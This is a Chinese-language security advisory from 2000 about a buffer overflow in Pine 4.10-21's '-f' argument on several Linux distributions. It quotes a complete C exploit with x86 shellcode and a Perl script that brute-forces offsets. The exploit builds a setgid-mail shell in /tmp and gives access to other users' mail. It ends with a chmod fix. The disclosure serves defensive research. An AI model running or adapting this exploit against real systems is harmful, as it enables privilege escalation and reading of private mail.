安全研究
安全漏洞
Linux pine "-f"参数缓冲区溢出漏洞
发布日期:2000-06-21
更新日期:2000-06-21
受影响系统:
不受影响系统:
Pine v4.10-21
- Linux Debian slink2.1
描述:
- Linux RedHat 6.x
- Linux Slackware 3.6
- Linux Slackware 7.0
Pine v4.10-21的"-f"参数用来手工指定一个打开的邮件夹文件名,如果
这个文件名的长度很长(大于1024字节),就可能使Pine发生缓冲区溢出。
在某些Linux系统(Debian slink2.1)中,pine被设置了sgid mail位,
因此攻击者可以得到mail组的权限。
而Linux RedHat和Slackware缺省pine没有设置sgid mail位,因此
尽管存在溢出问题,但并不构成严重的安全威胁。
<* 来源: v9 [v9@fakehalo.org] *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* (linux)pine[v4.10-21] buffer overflow, by v9[v9@fakehalo.org]. this will
give you a gid=mail shell if /usr/bin/pine is SGID(=2755). pine seems to
have some sort of alarm on this function when you overflow it - even if you
launch a shell it exits with an alarm timeout very quickly. so, with the
very limited time this program has to run it will write a shell to
/tmp/sh(by default) and setgid(mail) itself when pine runs shellcode.
tests: slackware3.6(non-sgid default) : used default offset. (-500)
slackware7.0(non-sgid default) : used default offset. (-500)
debian slink2.1(sgid-mail default): used default offset. (-500)
threat: pretty much just reading other users mail. (like you can debian
slink's default install)
notes: you must get to the "MAIN MENU" of pine before it overflows. so, if
it's youre first time running it you'll have to go through the opening
garbage. also, remember things tend to get buggy after this program
runs. yes, i know this isn't very clean. :)
pine notes: pine was never meant to be sgid mail or have any sort of
privileges. but, it seems some people just didn't listen and is
sgid mail on some distributions(like debian slink is)/servers.
(although, pine should take some of the responsibility)
here is the generic perl script(nothing new here):
#!/usr/bin/perl
$i=$ARGV[0];
while(1){
print "offset: $i.\n";
system("./pine_bof $i");
$i+=100;
} */
#include <stdio.h>
#define MAILGID 12 // group id of mail. (8 on deb[slink])
#define ALIGN 3 // alignment. (prolly don't need to change this)
#define PATH "/usr/bin/pine" // path to setgid pine.
#define CCPATH "/usr/bin/cc" // path to compiler.
#define SHELLNAME "/tmp/sh" // shouldn't change the size of this. (7char)
#define DEFAULT_OFFSET -500 // as usual, make it easy for the user. :/
static char exec[]=
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"
"\x00" // this will be the mail gid.
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"
"\xcd\x80\xe8\xd2\xff\xff\xff"
SHELLNAME // make sgid program/shell.
"\x01"; // my favorite charcter.
long esp(void){__asm__("movl %esp,%eax");}
int main(int argc,char **argv){
char bof[1036],ccname[32],cc[64];
int i,offset,gid=MAILGID;
long ret;
FILE *shell;
sprintf(ccname,"%s.c",SHELLNAME);
shell=fopen(ccname,"w");
fprintf(shell,"main(){system(\"chgrp %d %s;chmod 2755 %s;echo %s: self-functioning sgid=mail shell.\");setgid(%d);system(\"/bin/sh\");}\n",gid,SHELLNAME,SHELLNAME,SHELLNAME,gid);
fclose(shell);
sprintf(cc,"%s %s -o %s",CCPATH,ccname,SHELLNAME);
system(cc);
if(unlink(ccname)){printf("%s: failed removing shell source. (%s)\n",argv[0],ccname);}
if(argc>1){offset=atoi(argv[1]);}
else{offset=DEFAULT_OFFSET;}
ret=(esp()-offset);
exec[10]=gid; // fill in with the gid.
for(i=ALIGN;i<1027;i+=4){*(long *)&bof[i]=ret;}
for(i=0;i<(1027-strlen(exec)-200);i++){*(bof+i)=0x90;}
memcpy(bof+i,exec,strlen(exec));
printf("[ return address: 0x%lx, offset: %d, size: %d(sc=%d). ]\n",ret,offset,strlen(bof),strlen(exec));
sleep(1); // so you can see the ret, offset & size.
if(execlp(PATH,"pine","-f",bof,0)){
printf("%s: execution failed, maybe %s is non-existant?\n",argv[0],PATH);
exit(-1);
}
}
建议:
临时解决办法:
取消pine的sgid mail位:
chmod g-s /usr/bin/pine
浏览次数:6881
严重程度:0(网友投票)
绿盟科技给您安全的保障